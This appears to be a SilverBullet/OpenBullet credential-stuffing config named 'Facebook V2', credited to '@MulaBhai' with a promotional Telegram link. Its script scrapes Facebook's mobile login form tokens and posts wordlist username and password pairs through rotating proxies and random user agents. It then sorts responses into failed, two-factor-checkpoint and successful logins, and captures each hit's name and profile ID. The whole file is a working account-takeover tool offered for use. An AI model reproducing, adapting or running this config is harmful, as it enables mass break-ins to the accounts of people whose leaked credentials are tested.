[SETTINGS]
{
  "Name": "Facebook V2",
  "SuggestedBots": 20,
  "MaxCPM": 0,
  "LastModified": "2024-01-24T14:21:56.8401384+05:00",
  "AdditionalInfo": "JOIN MY CHANNEL https://t.me/officialgoldendragon",
  "RequiredPlugins": [],
  "Author": "@MulaBhai",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Facebook V2",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": "@MulaBhai",
  "Message": "JOIN MY CHANNEL https://t.me/officialgoldendragon",
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION GetRandomUA BROWSER Chrome -> VAR "ua" 

REQUEST GET "https://mbasic.facebook.com/login/" 
  
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,ar;q=0.8" 
  HEADER "referer: https://www.google.com/" 
  HEADER "sec-ch-prefers-color-scheme: dark" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: cross-site" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: <ua>" 

PARSE "<SOURCE>" LR "name=\"lsd\" value=\"" "\"" -> VAR "lsd" 

PARSE "<SOURCE>" LR "name=\"jazoest\" value=\"" "\"" -> VAR "jazoest" 

PARSE "<SOURCE>" LR "name=\"li\" value=\"" "\"" -> VAR "li" 

PARSE "<SOURCE>" LR "name=\"m_ts\" value=\"" "\"" -> VAR "m_ts" 

REQUEST POST "https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=deprecated&lwv=100" 
  CONTENT "lsd=<lsd>&jazoest=<jazoest>&m_ts=<m_ts>&li=<li>&try_number=0&unrecognized_tries=0&email=<USER>&pass=<PASS>&login=Log+In&bi_xrwh=0" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,ar;q=0.8" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://mbasic.facebook.com" 
  HEADER "referer: https://mbasic.facebook.com/login/" 
  HEADER "sec-ch-prefers-color-scheme: dark" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: <ua>" 

FUNCTION ClearCookies "https://mbasic.facebook.com/" -> VAR "C" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The email address that you've entered doesn't match any account." 
    KEY "The password you entered is incorrect." 
    KEY "The phone number that you&#039;ve entered doesn&#039;t match any account." 
    KEY "Invalid username or password" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "<ADDRESS>" Contains "/checkpoint/" 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" Contains "/login/save-device/?" 
    KEY "<COOKIES>" Contains "c_user" 

PARSE "<SOURCE>" LR "class=\"bp bj\" alt=\"" "," CreateEmpty=FALSE -> CAP "Name" 

PARSE "<COOKIES(c_user)>" LR "" "" -> CAP "ProfileID " 

